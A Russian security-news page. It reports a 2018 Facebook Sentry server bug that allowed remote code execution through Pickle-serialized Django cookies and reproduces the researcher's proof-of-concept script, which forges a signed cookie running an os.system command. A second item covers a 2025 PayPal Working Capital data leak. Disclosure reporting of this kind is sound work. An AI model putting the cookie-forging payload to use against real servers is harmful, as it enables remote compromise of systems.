Баг на сервере Facebook позволял удаленно запустить вредоносный код

Олег Иванов 28 Августа 2018 - 10:08

...

Баг на сервере Facebook позволял удаленно запустить вредоносный код

Разработчики Facebook исправили серьезный баг, который мог привести к удаленному выполнению кода. Сама уязвимость была обнаружена на одном из серверов интернет-гиганта, о чем сообщил исследователь безопасности Дэниел Ле Галл, также известный под псевдонимом «Blaklis».

Ле Галл, работающий в SCRT Information Security, в пятницу заявил, что ему выплатили $5000 за сообщение о проблеме безопасности.

Суть уязвимости в том, что злоумышленник может выполнить произвольные команды, используя вредоносные файлы cookie.

Несмотря на то, что подобные бреши обычно довольно опасны, эксперт подчеркнул, что с помощью этого бага нельзя было получить пользовательские данные. Разработчики устранили уязвимость в этом месяце, еще до того, как была опубликована информация о ее наличии.

«Blaklis» утверждает, что недостаток был найден на одном из серверов Facebook, где было запущено программное обеспечение для сбора логов Sentry.

«Само приложение было крайне нестабильным, особенно в отношении функции сброса пароля пользователя», — объясняет специалист.

В итоге Ле Галлу удалось найти в логах детали обработки cookie, а также подробности использования приложением протокола Pickle, который может быть уязвим для различного рода манипуляций. Используя все вышеозначенные данные, эксперт мог обработать файлы cookie, которые могли запускать команды на машине.

Исследователь опубликовал PoC-код, который является небольшим файлом cookie:

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os
SECRET_KEY='[RETRIEVEDKEY]'
#Initial cookie I had on sentry when trying to reset a password
cookie='gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
    def __reduce__(self):
        return (os.system,("sleep 30",))
newContent['testcookie'] = PickleRce()
print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)

Следующая главная новость »

Контейнеризация 2026: чем российские решения отличаются на практике? Регистрируйтесь на эфир!

Екатерина Быстрова 20 Февраля 2026 - 19:13

Уязвимости программ Утечки информации Умышленные утечки информации Кража данных Домашние пользователи Корпорации

Утечка в PayPal: персональные данные были открыты почти 6 месяцев

PayPal уведомляет клиентов о новой утечке данных, на этот раз из-за программной ошибки в приложении для бизнес-кредитов PayPal Working Capital (PPWC). В течение почти шести месяцев персональные данные пользователей могли быть доступны посторонним.

По информации компании, инцидент затронул приложение PPWC, которое позволяет малому бизнесу быстро получать финансирование.

Проблему обнаружили 12 декабря 2025 года. Выяснилось, что с 1 июля по 13 декабря 2025 года из-за некорректного изменения кода часть персональных данных оказалась открыта для неаутентифицированных лиц.

Речь идёт о конфиденциальной информации: имена, адреса электронной почты, номера телефонов, адреса компаний, номера социального страхования, а также даты рождения.

В письмах пострадавшим пользователям PayPal уточняет, что после обнаружения ошибки код был оперативно отозван, а потенциальный доступ к данным заблокирован уже на следующий день. Корпорация также подчеркнула, что уведомление не откладывалось из-за каких-либо действий правоохранительных органов.

Кроме самой утечки, PayPal выявила и несанкционированные транзакции по счетам небольшой части клиентов, они напрямую связаны с этим инцидентом. Представители платёжного сервиса заявили, что пострадавшим уже оформлены возвраты средств.

В качестве компенсации пользователям предлагают два года бесплатного мониторинга кредитной истории и услуг по восстановлению личности через Equifax (по трём кредитным бюро). Подключиться к программе нужно до 30 июня 2026 года.

Клиентам также рекомендуют внимательно следить за кредитными отчётами и активностью по счетам. Отдельно PayPal напомнила, что никогда не запрашивает пароли, одноразовые коды или другие данные аутентификации по телефону, СМС или электронной почте.

Сколько именно пользователей пострадало, компания пока не раскрывает. Известно, что для всех затронутых аккаунтов были сброшены пароли — при следующем входе пользователям предложат создать новые учётные данные, если они ещё этого не сделали.

Контейнеризация 2026: чем российские решения отличаются на практике? Регистрируйтесь на эфир!